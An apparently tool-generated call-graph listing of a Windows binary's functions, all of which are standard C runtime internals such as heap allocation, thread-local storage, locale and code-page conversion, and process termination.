17925->19136 17927 40ea1b 17927->17744 17929 40e8de _doexit 62 API calls 17928->17929 17930 40ea41 17929->17930 17930->17747 17932 40e775 Sleep GetModuleHandleW 17931->17932 17933 40e793 17932->17933 17934 40e797 17932->17934 17933->17932 17933->17934 17934->17752 17996 4104e0 17935->17996 17937 40ea5c __init_pointers __initp_misc_winsig 17999 41393d 17937->17999 17940 41046e __encode_pointer 6 API calls 17941 40ea98 17940->17941 17942 41046e TlsGetValue 17941->17942 17943 4104a7 GetModuleHandleW 17942->17943 17944 410486 17942->17944 17945 4104c2 GetProcAddress 17943->17945 17946 4104b7 17943->17946 17944->17943 17947 410490 TlsGetValue 17944->17947 17949 41049f 17945->17949 17948 40e76a __crt_waiting_on_module_handle 2 API calls 17946->17948 17951 41049b 17947->17951 17950 4104bd 17948->17950 17949->17767 17950->17945 17950->17949 17951->17943 17951->17949 17953 40d56f 17952->17953 17955 40d59d 17953->17955 18002 41389c 17953->18002 17955->17754 17956 4104e9 TlsGetValue 17955->17956 17957 410501 17956->17957 17958 410522 GetModuleHandleW 17956->17958 17957->17958 17959 41050b TlsGetValue 17957->17959 17960 410532 17958->17960 17961 41053d GetProcAddress 17958->17961 17964 410516 17959->17964 17962 40e76a __crt_waiting_on_module_handle 2 API calls 17960->17962 17963 41051a 17961->17963 17965 410538 17962->17965 17963->17754 17966 411cba 17963->17966 17964->17958 17964->17963 17965->17961 17965->17963 17969 411cc3 17966->17969 17968 4109c5 17968->17754 17968->17779 17969->17968 17970 411ce1 Sleep 17969->17970 18007 40e231 17969->18007 17971 411cf6 17970->17971 17971->17968 17971->17969 18275 40e1d8 17972->18275 17974 4105e1 GetModuleHandleW 17975 4105f1 17974->17975 17976 4105f7 17974->17976 17977 40e76a __crt_waiting_on_module_handle 2 API calls 17975->17977 17978 410633 17976->17978 17979 41060f GetProcAddress GetProcAddress 17976->17979 17977->17976 17980 40d6e0 __lock 58 API calls 17978->17980 17979->17978 17981 410652 InterlockedIncrement 17980->17981 18276 4106aa 17981->18276 17984 40d6e0 __lock 58 API calls 17985 410673 17984->17985 18279 4145d2 InterlockedIncrement 17985->18279 17987 410691 18291 4106b3 17987->18291 17989 41069e _getenv 17989->17783 17991 4105a2 17990->17991 17992 4105ae 17990->17992 17993 4104e9 __decode_pointer 6 API calls 17991->17993 17994 4105d0 17992->17994 17995 4105c2 TlsFree 17992->17995 17993->17992 17994->17994 17995->17994 17997 41046e __encode_pointer 6 API calls 17996->17997 17998 4104e7 17997->17998 17998->17937 18000 41046e __encode_pointer 6 API calls 17999->18000 18001 40ea8e 18000->18001 18001->17940 18006 40e1d8 18002->18006 18004 4138a8 InitializeCriticalSectionAndSpinCount 18005 4138ec _getenv 18004->18005 18005->17953 18006->18004 18008 40e23d _getenv 18007->18008 18009 40e255 18008->18009 18019 40e274 _memset 18008->18019 18020 40bfc1 18009->18020 18013 40e2e6 RtlAllocateHeap 18013->18019 18016 40e26a _getenv 18016->17969 18019->18013 18019->18016 18026 40d6e0 18019->18026 18033 40def2 18019->18033 18039 40e32d 18019->18039 18042 40d2e3 18019->18042 18045 4106bc GetLastError 18020->18045 18022 40bfc6 18023 40e744 18022->18023 18024 4104e9 __decode_pointer 6 API calls 18023->18024 18025 40e754 __invoke_watson 18024->18025 18027 40d6f5 18026->18027 18028 40d708 EnterCriticalSection 18026->18028 18070 40d61d 18027->18070 18028->18019 18030 40d6fb 18030->18028 18031 40e79a __amsg_exit 61 API calls 18030->18031 18032 40d707 18031->18032 18032->18028 18035 40df20 18033->18035 18034 40dfc2 18034->18019 18035->18034 18038 40dfb9 18035->18038 18263 40da59 18035->18263 18038->18034 18270 40db09 18038->18270 18274 40d606 LeaveCriticalSection 18039->18274 18041 40e334 18041->18019 18043 4104e9 __decode_pointer 6 API calls 18042->18043 18044 40d2f3 18043->18044 18044->18019 18059 410564 TlsGetValue 18045->18059 18047 410729 SetLastError 18047->18022 18049 411cba __calloc_crt 59 API calls 18050 4106e7 18049->18050 18050->18047 18051 4104e9 __decode_pointer 6 API calls 18050->18051 18052 410701 18051->18052 18053 410720 18052->18053 18054 410708 18052->18054 18064 40b6b5 18053->18064 18055 4105d5 __initptd 59 API calls 18054->18055 18057 410710 GetCurrentThreadId 18055->18057 18057->18047 18058 410726 18058->18047 18060 410594 18059->18060 18061 410579 18059->18061 18060->18047 18060->18049 18062 4104e9 __decode_pointer 6 API calls 18061->18062 18063 410584 TlsSetValue 18062->18063 18063->18060 18065 40b6c1 _getenv 18064->18065 18066 40b73d _getenv 18065->18066 18067 40b714 HeapFree 18065->18067 18066->18058 18067->18066 18068 40b727 18067->18068 18069 40bfc1 __mbsnbcmp_l 61 API calls 18068->18069 18069->18066 18071 40d629 _getenv 18070->18071 18072 40d64f 18071->18072 18096 40ec4d 18071->18096 18078 40d65f _getenv 18072->18078 18142 411c75 18072->18142 18078->18030 18080 40d680 18084 40d6e0 __lock 62 API calls 18080->18084 18081 40d671 18083 40bfc1 __mbsnbcmp_l 62 API calls 18081->18083 18083->18078 18085 40d687 18084->18085 18086 40d6bb 18085->18086 18087 40d68f 18085->18087 18089 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18086->18089 18088 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 18087->18088 18090 40d69a 18088->18090 18091 40d6ac 18089->18091 18090->18091 18092 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18090->18092 18148 40d6d7 18091->18148 18094 40d6a6 18092->18094 18095 40bfc1 __mbsnbcmp_l 62 API calls 18094->18095 18095->18091 18151 413d5b 18096->18151 18099 40ec61 18100 40eaa2 __NMSG_WRITE 62 API calls 18099->18100 18103 40d63e 18099->18103 18102 40ec79 18100->18102 18101 413d5b __set_error_mode 62 API calls 18101->18099 18104 40eaa2 __NMSG_WRITE 62 API calls 18102->18104 18105 40eaa2 18103->18105 18104->18103 18106 40eab6 18105->18106 18107 413d5b __set_error_mode 59 API calls 18106->18107 18138 40d645 18106->18138 18108 40ead8 18107->18108 18109 40ec16 GetStdHandle 18108->18109 18111 413d5b __set_error_mode 59 API calls 18108->18111 18110 40ec24 _strlen 18109->18110 18109->18138 18114 40ec3d WriteFile 18110->18114 18110->18138 18112 40eae9 18111->18112 18112->18109 18113 40eafb 18112->18113 18113->18138 18157 40ef42 18113->18157 18114->18138 18117 40eb31 GetModuleFileNameA 18119 40eb4f 18117->18119 18123 40eb72 _strlen 18117->18123 18121 40ef42 _strcpy_s 59 API calls 18119->18121 18122 40eb5f 18121->18122 18122->18123 18124 40e61c __invoke_watson 10 API calls 18122->18124 18135 40ebb5 18123->18135 18173 411da6 18123->18173 18124->18123 18128 40ebd9 18131 413ce7 _strcat_s 59 API calls 18128->18131 18130 40e61c __invoke_watson 10 API calls 18130->18128 18132 40ebed 18131->18132 18134 40ebfe 18132->18134 18136 40e61c __invoke_watson 10 API calls 18132->18136 18133 40e61c __invoke_watson 10 API calls 18133->18135 18191 413b7e 18134->18191 18182 413ce7 18135->18182 18136->18134 18139 40e7ee 18138->18139 18229 40e7c3 GetModuleHandleW 18139->18229 18145 411c7e 18142->18145 18144 40d66a 18144->18080 18144->18081 18145->18144 18146 411c95 Sleep 18145->18146 18232 40b84d 18145->18232 18147 411caa 18146->18147 18147->18144 18147->18145 18262 40d606 LeaveCriticalSection 18148->18262 18150 40d6de 18150->18078 18152 413d6a 18151->18152 18153 40bfc1 __mbsnbcmp_l 62 API calls 18152->18153 18156 40ec54 18152->18156 18154 413d8d 18153->18154 18155 40e744 __mbsnbcmp_l 6 API calls 18154->18155 18155->18156 18156->18099 18156->18101 18158 40ef53 18157->18158 18159 40ef5a 18157->18159 18158->18159 18164 40ef80 18158->18164 18160 40bfc1 __mbsnbcmp_l 62 API calls 18159->18160 18161 40ef5f 18160->18161 18162 40e744 __mbsnbcmp_l 6 API calls 18161->18162 18163 40eb1d 18162->18163 18163->18117 18166 40e61c 18163->18166 18164->18163 18165 40bfc1 __mbsnbcmp_l 62 API calls 18164->18165 18165->18161 18218 40ba30 18166->18218 18168 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18169 40e725 GetCurrentProcess TerminateProcess 18168->18169 18170 40e719 __invoke_watson 18168->18170 18220 40ce09 18169->18220 18170->18169 18172 40e742 18172->18117 18178 411db8 18173->18178 18174 411dbc 18175 40bfc1 __mbsnbcmp_l 62 API calls 18174->18175 18176 40eba2 18174->18176 18177 411dd8 18175->18177 18176->18133 18176->18135 18179 40e744 __mbsnbcmp_l 6 API calls 18177->18179 18178->18174 18178->18176 18180 411e02 18178->18180 18179->18176 18180->18176 18181 40bfc1 __mbsnbcmp_l 62 API calls 18180->18181 18181->18177 18183 413cf8 18182->18183 18184 413cff 18182->18184 18183->18184 18188 413d33 18183->18188 18185 40bfc1 __mbsnbcmp_l 62 API calls 18184->18185 18186 413d04 18185->18186 18187 40e744 __mbsnbcmp_l 6 API calls 18186->18187 18189 40ebc8 18187->18189 18188->18189 18190 40bfc1 __mbsnbcmp_l 62 API calls 18188->18190 18189->18128 18189->18130 18190->18186 18192 4104e0 ___crtMessageBoxW 6 API calls 18191->18192 18193 413b8e 18192->18193 18194 413ba1 LoadLibraryA 18193->18194 18217 413c29 18193->18217 18195 413bb6 GetProcAddress 18194->18195 18198 413ccb 18194->18198 18197 413bcc 18195->18197 18195->18198 18196 413c7e 18202 4104e9 __decode_pointer 6 API calls 18196->18202 18201 41046e __encode_pointer 6 API calls 18197->18201 18198->18138 18199 4104e9 __decode_pointer 6 API calls 18211 413c96 18199->18211 18200 4104e9 __decode_pointer 6 API calls 18203 413c46 18200->18203 18204 413bd2 GetProcAddress 18201->18204 18202->18198 18205 4104e9 __decode_pointer 6 API calls 18203->18205 18206 41046e __encode_pointer 6 API calls 18204->18206 18209 413c53 18205->18209 18207 413be7 GetProcAddress 18206->18207 18208 41046e __encode_pointer 6 API calls 18207->18208 18210 413bfc GetProcAddress 18208->18210 18209->18196 18209->18199 18212 41046e __encode_pointer 6 API calls 18210->18212 18211->18196 18213 4104e9 __decode_pointer 6 API calls 18211->18213 18214 413c11 18212->18214 18213->18196 18215 413c1b GetProcAddress 18214->18215 18214->18217 18216 41046e __encode_pointer 6 API calls 18215->18216 18216->18217 18217->18200 18217->18209 18219 40ba3c __VEC_memzero 18218->18219 18219->18168 18221 40ce11 18220->18221 18222 40ce13 IsDebuggerPresent 18220->18222 18221->18172 18228 4138fc 18222->18228 18225 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 18226 413723 __invoke_watson 18225->18226 18227 41372b GetCurrentProcess TerminateProcess 18225->18227 18226->18227 18227->18172 18228->18225 18230 40e7d7 GetProcAddress 18229->18230 18231 40e7e7 ExitProcess 18229->18231 18230->18231 18233 40b900 18232->18233 18243 40b85f 18232->18243 18234 40d2e3 _malloc 6 API calls 18233->18234 18235 40b906 18234->18235 18237 40bfc1 __mbsnbcmp_l 61 API calls 18235->18237 18236 40ec4d __FF_MSGBANNER 61 API calls 18241 40b870 18236->18241 18249 40b8f8 18237->18249 18239 40eaa2 __NMSG_WRITE 61 API calls 18239->18241 18240 40b8bc RtlAllocateHeap 18240->18243 18241->18236 18241->18239 18242 40e7ee _malloc 3 API calls 18241->18242 18241->18243 18242->18241 18243->18240 18243->18241 18244 40b8ec 18243->18244 18246 40d2e3 _malloc 6 API calls 18243->18246 18247 40b8f1 18243->18247 18243->18249 18250 40b7fe 18243->18250 18245 40bfc1 __mbsnbcmp_l 61 API calls 18244->18245 18245->18247 18246->18243 18248 40bfc1 __mbsnbcmp_l 61 API calls 18247->18248 18248->18249 18249->18145 18251 40b80a _getenv 18250->18251 18252 40b83b _getenv 18251->18252 18253 40d6e0 __lock 62 API calls 18251->18253 18252->18243 18254 40b820 18253->18254 18255 40def2 ___sbh_alloc_block 5 API calls 18254->18255 18256 40b82b 18255->18256 18258 40b844 18256->18258 18261 40d606 LeaveCriticalSection 18258->18261 18260 40b84b 18260->18252 18261->18260 18262->18150 18264 40daa0 HeapAlloc 18263->18264 18265 40da6c HeapReAlloc 18263->18265 18267 40dac3 VirtualAlloc 18264->18267 18269 40da8a 18264->18269 18266 40da8e 18265->18266 18265->18269 18266->18264 18268 40dadd HeapFree 18267->18268 18267->18269 18268->18269 18269->18038 18271 40db20 VirtualAlloc 18270->18271 18273 40db67 18271->18273 18273->18034 18274->18041 18275->17974 18294 40d606 LeaveCriticalSection 18276->18294 18278 41066c 18278->17984 18280 4145f0 InterlockedIncrement 18279->18280 18281 4145f3 18279->18281 18280->18281 18282 414600 18281->18282 18283 4145fd InterlockedIncrement 18281->18283 18284 41460a InterlockedIncrement 18282->18284 18285 41460d 18282->18285 18283->18282 18284->18285 18286 414617 InterlockedIncrement 18285->18286 18287 41461a 18285->18287 18286->18287 18288 414633 InterlockedIncrement 18287->18288 18289 414643 InterlockedIncrement 18287->18289 18290 41464e InterlockedIncrement 18287->18290 18288->18287 18289->18287 18290->17987 18295 40d606 LeaveCriticalSection 18291->18295 18293 4106ba 18293->17989 18294->18278 18295->18293 18296->17786 18298 414474 18297->18298 18299 41447b 18297->18299 18301 4142d1 18298->18301 18299->17828 18302 4142dd _getenv 18301->18302 18332 410735 18302->18332 18306 4142f0 18353 414070 18306->18353 18309 411c75 __malloc_crt 62 API calls 18310 414311 18309->18310 18311 414430 _getenv 18310->18311 18360 4140ec 18310->18360 18311->18299 18314 414341 InterlockedDecrement 18316 414351 18314->18316 18317 414362 InterlockedIncrement 18314->18317 18315 41443d 18315->18311 18319 414450 18315->18319 18322 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18315->18322 18316->18317 18321 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18316->18321 18317->18311 18318 414378 18317->18318 18318->18311 18324 40d6e0 __lock 62 API calls 18318->18324 18320 40bfc1 __mbsnbcmp_l 62 API calls 18319->18320 18320->18311 18323 414361 18321->18323 18322->18319 18323->18317 18326 41438c InterlockedDecrement 18324->18326 18327 414408 18326->18327 18328 41441b InterlockedIncrement 18326->18328 18327->18328 18330 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18327->18330 18370 414432 18328->18370 18331 41441a 18330->18331 18331->18328 18333 4106bc __getptd_noexit 62 API calls 18332->18333 18334 41073d 18333->18334 18335 41074a 18334->18335 18336 40e79a __amsg_exit 62 API calls 18334->18336 18337 413fcc 18335->18337 18336->18335 18338 413fd8 _getenv 18337->18338 18339 410735 __getptd 62 API calls 18338->18339 18340 413fdd 18339->18340 18341 40d6e0 __lock 62 API calls 18340->18341 18342 413fef 18340->18342 18343 41400d 18341->18343 18348 40e79a __amsg_exit 62 API calls 18342->18348 18349 413ffd _getenv 18342->18349 18344 414056 18343->18344 18345 414024 InterlockedDecrement 18343->18345 18346 41403e InterlockedIncrement 18343->18346 18373 414067 18344->18373 18345->18346 18350 41402f 18345->18350 18346->18344 18348->18349 18349->18306 18350->18346 18351 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18350->18351 18352 41403d 18351->18352 18352->18346 18377 40ec86 18353->18377 18356 4140ad 18358 4140b2 GetACP 18356->18358 18359 41409f 18356->18359 18357 41408f GetOEMCP 18357->18359 18358->18359 18359->18309 18359->18311 18361 414070 getSystemCP 74 API calls 18360->18361 18364 41410c 18361->18364 18362 414117 setSBCS 18365 40ce09 __atodbl_l 5 API calls 18362->18365 18363 414180 _memset __setmbcp_nolock 18568 413e39 GetCPInfo 18363->18568 18364->18362 18364->18363 18367 41415b IsValidCodePage 18364->18367 18366 4142cf 18365->18366 18366->18314 18366->18315 18367->18362 18368 41416d GetCPInfo 18367->18368 18368->18362 18368->18363 18701 40d606 LeaveCriticalSection 18370->18701 18372 414439 18372->18311 18376 40d606 LeaveCriticalSection 18373->18376 18375 41406e 18375->18342 18376->18375 18378 40ec99 18377->18378 18384 40ece6 18377->18384 18379 410735 __getptd 62 API calls 18378->18379 18380 40ec9e 18379->18380 18381 40ecc6 18380->18381 18385 414738 18380->18385 18383 413fcc _LocaleUpdate::_LocaleUpdate 64 API calls 18381->18383 18381->18384 18383->18384 18384->18356 18384->18357 18386 414744 _getenv 18385->18386 18387 410735 __getptd 62 API calls 18386->18387 18388 414749 18387->18388 18389 414777 18388->18389 18391 41475b 18388->18391 18390 40d6e0 __lock 62 API calls 18389->18390 18392 41477e 18390->18392 18393 410735 __getptd 62 API calls 18391->18393 18400 4146fa 18392->18400 18394 414760 18393->18394 18398 40e79a __amsg_exit 62 API calls 18394->18398 18399 41476e _getenv 18394->18399 18398->18399 18399->18381 18401 4146fe 18400->18401 18407 414730 18400->18407 18402 4145d2 ___addlocaleref 8 API calls 18401->18402 18401->18407 18403 414711 18402->18403 18403->18407 18411 414661 18403->18411 18408 4147a2 18407->18408 18567 40d606 LeaveCriticalSection 18408->18567 18410 4147a9 18410->18394 18412 414672 InterlockedDecrement 18411->18412 18413 4146f5 18411->18413 18414 414687 InterlockedDecrement 18412->18414 18415 41468a 18412->18415 18413->18407 18425 414489 18413->18425 18414->18415 18416 414694 InterlockedDecrement 18415->18416 18417 414697 18415->18417 18416->18417 18418 4146a1 InterlockedDecrement 18417->18418 18419 4146a4 18417->18419 18418->18419 18420 4146ae InterlockedDecrement 18419->18420 18422 4146b1 18419->18422 18420->18422 18421 4146ca InterlockedDecrement 18421->18422 18422->18421 18423 4146da InterlockedDecrement 18422->18423 18424 4146e5 InterlockedDecrement 18422->18424 18423->18422 18424->18413 18426 4144a0 18425->18426 18427 41450d 18425->18427 18426->18427 18429 4144d4 18426->18429 18436 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18426->18436 18428 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18427->18428 18454 41455a 18427->18454 18431 41452e 18428->18431 18433 4144f5 18429->18433 18444 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18429->18444 18434 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18431->18434 18435 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18433->18435 18440 414541 18434->18440 18441 414502 18435->18441 18442 4144c9 18436->18442 18437 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18439 414581 18437->18439 18438 4145c6 18443 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18438->18443 18439->18438 18445 40b6b5 62 API calls ___crtGetEnvironmentStringsA 18439->18445 18446 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18440->18446 18447 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18441->18447 18455 417841 18442->18455 18449 4145cc 18443->18449 18450 4144ea 18444->18450 18445->18439 18451 41454f 18446->18451 18447->18427 18449->18407 18471 4177fc 18450->18471 18453 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18451->18453 18453->18454 18454->18439 18479 417667 18454->18479 18456 4178cb 18455->18456 18457 41784e 18455->18457 18456->18429 18458 41785f 18457->18458 18459 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18457->18459 18460 417871 18458->18460 18461 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18458->18461 18459->18458 18462 417883 18460->18462 18463 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18460->18463 18461->18460 18464 417895 18462->18464 18465 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18462->18465 18463->18462 18466 4178a7 18464->18466 18467 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18464->18467 18465->18464 18468 4178b9 18466->18468 18469 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18466->18469 18467->18466 18468->18456 18470 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18468->18470 18469->18468 18470->18456 18472 417809 18471->18472 18478 41783d 18471->18478 18473 417819 18472->18473 18474 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18472->18474 18475 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18473->18475 18476 41782b 18473->18476 18474->18473 18475->18476 18477 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18476->18477 18476->18478 18477->18478 18478->18433 18480 41457a 18479->18480 18481 417678 18479->18481 18480->18437 18482 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18481->18482 18483 417680 18482->18483 18484 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18483->18484 18485 417688 18484->18485 18486 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18485->18486 18487 417690 18486->18487 18488 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18487->18488 18489 417698 18488->18489 18490 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18489->18490 18491 4176a0 18490->18491 18492 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18491->18492 18493 4176a8 18492->18493 18494 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18493->18494 18495 4176af 18494->18495 18496 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18495->18496 18497 4176b7 18496->18497 18498 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18497->18498 18499 4176bf 18498->18499 18500 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18499->18500 18501 4176c7 18500->18501 18502 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18501->18502 18503 4176cf 18502->18503 18504 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18503->18504 18505 4176d7 18504->18505 18506 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18505->18506 18507 4176df 18506->18507 18508 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18507->18508 18509 4176e7 18508->18509 18510 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18509->18510 18511 4176ef 18510->18511 18512 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18511->18512 18513 4176f7 18512->18513 18514 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18513->18514 18515 417702 18514->18515 18516 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18515->18516 18517 41770a 18516->18517 18518 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18517->18518 18519 417712 18518->18519 18520 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18519->18520 18521 41771a 18520->18521 18522 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18521->18522 18523 417722 18522->18523 18524 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18523->18524 18525 41772a 18524->18525 18526 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18525->18526 18527 417732 18526->18527 18528 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18527->18528 18529 41773a 18528->18529 18530 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18529->18530 18531 417742 18530->18531 18532 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18531->18532 18533 41774a 18532->18533 18534 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18533->18534 18535 417752 18534->18535 18536 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18535->18536 18537 41775a 18536->18537 18538 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18537->18538 18539 417762 18538->18539 18540 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18539->18540 18541 41776a 18540->18541 18542 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18541->18542 18543 417772 18542->18543 18544 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18543->18544 18545 41777a 18544->18545 18546 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18545->18546 18547 417788 18546->18547 18548 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18547->18548 18549 417793 18548->18549 18550 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18549->18550 18551 41779e 18550->18551 18552 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18551->18552 18553 4177a9 18552->18553 18554 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18553->18554 18555 4177b4 18554->18555 18556 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18555->18556 18557 4177bf 18556->18557 18558 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18557->18558 18559 4177ca 18558->18559 18560 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18559->18560 18561 4177d5 18560->18561 18562 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18561->18562 18563 4177e0 18562->18563 18564 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18563->18564 18565 4177eb 18564->18565 18566 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18565->18566 18566->18480 18567->18410 18571 413e6d _memset 18568->18571 18577 413f1f 18568->18577 18578 417625 18571->18578 18573 40ce09 __atodbl_l 5 API calls 18575 413fca 18573->18575 18575->18363 18576 417426 ___crtLCMapStringA 97 API calls 18576->18577 18577->18573 18579 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 18578->18579 18580 417638 18579->18580 18588 41746b 18580->18588 18583 417426 18584 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 18583->18584 18585 417439 18584->18585 18654 417081 18585->18654 18589 4174b7 18588->18589 18590 41748c GetStringTypeW 18588->18590 18591 4174a4 18589->18591 18593 41759e 18589->18593 18590->18591 18592 4174ac GetLastError 18590->18592 18594 4174f0 MultiByteToWideChar 18591->18594 18611 417598 18591->18611 18592->18589 18616 417a20 GetLocaleInfoA 18593->18616 18601 41751d 18594->18601 18594->18611 18596 40ce09 __atodbl_l 5 API calls 18598 413eda 18596->18598 18598->18583 18599 4175ef GetStringTypeA 18604 41760a 18599->18604 18599->18611 18600 417532 _memset __crtGetStringTypeA_stat 18603 41756b MultiByteToWideChar 18600->18603 18600->18611 18601->18600 18605 40b84d _malloc 62 API calls 18601->18605 18607 417581 GetStringTypeW 18603->18607 18608 417592 18603->18608 18609 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18604->18609 18605->18600 18607->18608 18612 4147ae 18608->18612 18609->18611 18611->18596 18613 4147ba 18612->18613 18614 4147cb 18612->18614 18613->18614 18615 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18613->18615 18614->18611 18615->18614 18617 417a53 18616->18617 18618 417a4e 18616->18618 18647 416f54 18617->18647 18620 40ce09 __atodbl_l 5 API calls 18618->18620 18621 4175c2 18620->18621 18621->18599 18621->18611 18622 417a69 18621->18622 18623 417aa9 GetCPInfo 18622->18623 18624 417b33 18622->18624 18625 417ac0 18623->18625 18626 417b1e MultiByteToWideChar 18623->18626 18627 40ce09 __atodbl_l 5 API calls 18624->18627 18625->18626 18628 417ac6 GetCPInfo 18625->18628 18626->18624 18631 417ad9 _strlen 18626->18631 18629 4175e3 18627->18629 18628->18626 18630 417ad3 18628->18630 18629->18599 18629->18611 18630->18626 18630->18631 18632 40b84d _malloc 62 API calls 18631->18632 18635 417b0b _memset __crtGetStringTypeA_stat 18631->18635 18632->18635 18633 417b68 MultiByteToWideChar 18634 417b80 18633->18634 18644 417b9f 18633->18644 18637 417ba4 18634->18637 18638 417b87 WideCharToMultiByte 18634->18638 18635->18624 18635->18633 18636 4147ae __freea 62 API calls 18636->18624 18639 417bc3 18637->18639 18640 417baf WideCharToMultiByte 18637->18640 18638->18644 18641 411cba __calloc_crt 62 API calls 18639->18641 18640->18639 18640->18644 18642 417bcb 18641->18642 18643 417bd4 WideCharToMultiByte 18642->18643 18642->18644 18643->18644 18645 417be6 18643->18645 18644->18636 18646 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18645->18646 18646->18644 18650 41a354 18647->18650 18651 41a36d 18650->18651 18652 41a125 strtoxl 86 API calls 18651->18652 18653 416f65 18652->18653 18653->18618 18655 4170a2 LCMapStringW 18654->18655 18658 4170bd 18654->18658 18656 4170c5 GetLastError 18655->18656 18655->18658 18656->18658 18657 4172bb 18660 417a20 ___ansicp 86 API calls 18657->18660 18658->18657 18659 417117 18658->18659 18661 417130 MultiByteToWideChar 18659->18661 18683 4172b2 18659->18683 18662 4172e3 18660->18662 18667 41715d 18661->18667 18661->18683 18665 4173d7 LCMapStringA 18662->18665 18666 4172fc 18662->18666 18662->18683 18663 40ce09 __atodbl_l 5 API calls 18664 413efa 18663->18664 18664->18576 18700 417333 18665->18700 18668 417a69 ___convertcp 69 API calls 18666->18668 18671 40b84d _malloc 62 API calls 18667->18671 18679 417176 __crtGetStringTypeA_stat 18667->18679 18672 41730e 18668->18672 18669 4171ae MultiByteToWideChar 18673 4171c7 LCMapStringW 18669->18673 18674 4172a9 18669->18674 18670 4173fe 18681 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18670->18681 18670->18683 18671->18679 18676 417318 LCMapStringA 18672->18676 18672->18683 18673->18674 18678 4171e8 18673->18678 18677 4147ae __freea 62 API calls 18674->18677 18675 40b6b5 ___crtGetEnvironmentStringsA 62 API calls 18675->18670 18686 41733a 18676->18686 18676->18700 18677->18683 18680 4171f1 18678->18680 18685 41721a 18678->18685 18679->18669 18679->18683 18680->18674 18682 417203 LCMapStringW 18680->18682 18681->18683 18682->18674 18683->18663 18684 417269 LCMapStringW 18688 417281 WideCharToMultiByte 18684->18688 18689 4172a3 18684->18689 18691 417235 __crtGetStringTypeA_stat 18685->18691 18692 40b84d _malloc 62 API calls 18685->18692 18687 41734b _memset __crtGetStringTypeA_stat 18686->18687 18690 40b84d _malloc 62 API calls 18686->18690 18694 417389 LCMapStringA 18687->18694 18687->18700 18688->18689 18693 4147ae __freea 62 API calls 18689->18693 18690->18687 18691->18674 18691->18684 18692->18691 18693->18674 18696 4173a5 18694->18696 18697 4173a9 18694->18697 18699 4147ae __freea 62 API calls 18696->18699 18698 417a69 ___convertcp 69 API calls 18697->18698 18698->18696 18699->18700 18700->18670 18700->18675 18701->18372 18703 41358c 18702->18703 18704 41046e __encode_pointer 6 API calls 18703->18704 18705 4135a4 18703->18705 18704->18703 18705->17842 18709 40d281 18706->18709 18708 40d2ca 18708->17844 18710 40d28d _getenv 